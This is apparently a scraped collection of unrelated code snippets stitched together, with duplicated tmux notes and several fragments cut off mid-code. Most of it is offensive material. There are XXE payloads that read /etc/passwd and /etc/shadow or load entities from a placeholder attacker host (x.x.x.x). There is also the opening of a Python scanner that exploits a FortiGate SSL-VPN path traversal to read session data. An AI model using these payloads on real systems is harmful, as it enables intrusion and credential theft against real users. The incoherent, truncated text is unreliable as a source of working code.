As configured in my dotfiles.
start new:
tmux
start new with session name:
As configured in my dotfiles.
start new:
tmux
start new with session name:
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
#!/usr/bin/env python | |
""" | |
Simple HTTP URL redirector | |
Shreyas Cholia 10/01/2015 | |
usage: redirect.py [-h] [--port PORT] [--ip IP] redirect_url | |
HTTP redirect server | |
positional arguments: |
from PIL import Image | |
import sys | |
# Team RTFM - Red Team Freakin' Maniacs - rtfm-ctf.org | |
# Writeup - We also have memes!- 3DS-CTF | |
#playing another CTFs, our team discovered an awesome algorithm to hid messages in a PNG file. | |
#One member of the team told that is possible to improve the algorithm to make it impossible to retrieve the original message directly. So he hiden a message on this meme and gave to us to solve. | |
#Prove the he's wrong! |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> |
<?xml version=”1.0"?> | |
<!DOCTYPE data [ | |
<!ELEMENT data (#ANY)> | |
<!ENTITY file SYSTEM “file:///etc/passwd”>]> | |
<data>&file;</data> | |
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> | |
xxe.dtd: |
import requests, binascii, optparse | |
from urlparse import urlparse | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
requests.packages.urllib3.disable_warnings() | |
import multiprocessing | |
def checkIP(ip): | |
try: | |
url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" |